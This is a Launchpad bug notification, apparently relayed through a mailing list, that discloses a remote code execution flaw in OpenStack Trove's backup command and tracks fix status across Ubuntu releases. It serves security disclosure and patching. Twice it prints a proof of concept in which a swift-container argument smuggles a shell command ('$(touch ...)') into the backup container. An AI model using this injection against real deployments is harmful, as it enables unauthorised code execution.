[Bug 2028680] [NEW] Remote code execution: Trove backup
Corey Bryant
2028680 at bugs.launchpad.net
Tue Jul 25 15:07:23 UTC 2023
Public bug reported:
Note: Details taken from
https://storyboard.openstack.org/#!/story/2010004
An external security audit by Adam Bell, CyberCX New Zealand (conducted
for Catalyst Cloud) has identified a Remote Code Execution security
issue in Trove.
During a Trove instance backup command, it is possible to pass through
extra arguments via guestagent to docker, and utilize a subprocess shell
within backup python code to perform a Remote Code Execution within the
Trove backup container.
Replication steps:
1) Create mysql database instance.
2) Issue a backup command using the following: $ openstack database backup create --instance rce-db1 --swift-container 'test --db-user="$(touch /rce_successful.txt)"' backup-name1
Validation of the RCE can be observed from within the Trove VM:
root at rce-db1:~# docker cp db_backup:/rce_successful.txt .
root at rce-db1:~# ls -l rce_successful.txt
-rw-r--r-- 1 root root 0 Apr 20 04:20 rce_successful.txt
The executed touch command above can be replaced with any shell actions,
including apt.
** Affects: openstack-trove (Ubuntu)
Importance: High
Status: Fix Released
** Affects: openstack-trove (Ubuntu Jammy)
Importance: High
Status: Triaged
** Affects: openstack-trove (Ubuntu Lunar)
Importance: High
Status: Fix Released
** Affects: openstack-trove (Ubuntu Mantic)
Importance: High
Status: Fix Released
** Also affects: openstack-trove (Ubuntu Mantic)
Importance: Undecided
Status: New
** Also affects: openstack-trove (Ubuntu Lunar)
Importance: Undecided
Status: New
** Also affects: openstack-trove (Ubuntu Jammy)
Importance: Undecided
Status: New
** Changed in: openstack-trove (Ubuntu Lunar)
Status: New => Fix Released
** Changed in: openstack-trove (Ubuntu Mantic)
Status: New => Fix Released
** Changed in: openstack-trove (Ubuntu Jammy)
Status: New => Triaged
** Changed in: openstack-trove (Ubuntu Jammy)
Importance: Undecided => High
** Changed in: openstack-trove (Ubuntu Lunar)
Importance: Undecided => High
** Changed in: openstack-trove (Ubuntu Mantic)
Importance: Undecided => High
--
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to openstack-trove in Ubuntu.
https://bugs.launchpad.net/bugs/2028680
Title:
Remote code execution: Trove backup
Status in openstack-trove package in Ubuntu:
Fix Released
Status in openstack-trove source package in Jammy:
Triaged
Status in openstack-trove source package in Lunar:
Fix Released
Status in openstack-trove source package in Mantic:
Fix Released
Bug description:
Note: Details taken from
https://storyboard.openstack.org/#!/story/2010004
An external security audit by Adam Bell, CyberCX New Zealand
(conducted for Catalyst Cloud) has identified a Remote Code Execution
security issue in Trove.
During a Trove instance backup command, it is possible to pass through
extra arguments via guestagent to docker, and utilize a subprocess
shell within backup python code to perform a Remote Code Execution
within the Trove backup container.
Replication steps:
1) Create mysql database instance.
2) Issue a backup command using the following: $ openstack database backup create --instance rce-db1 --swift-container 'test --db-user="$(touch /rce_successful.txt)"' backup-name1
Validation of the RCE can be observed from within the Trove VM:
root at rce-db1:~# docker cp db_backup:/rce_successful.txt .
root at rce-db1:~# ls -l rce_successful.txt
-rw-r--r-- 1 root root 0 Apr 20 04:20 rce_successful.txt
The executed touch command above can be replaced with any shell
actions, including apt.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openstack-trove/+bug/2028680/+subscriptions
More information about the Ubuntu-openstack-bugs
mailing list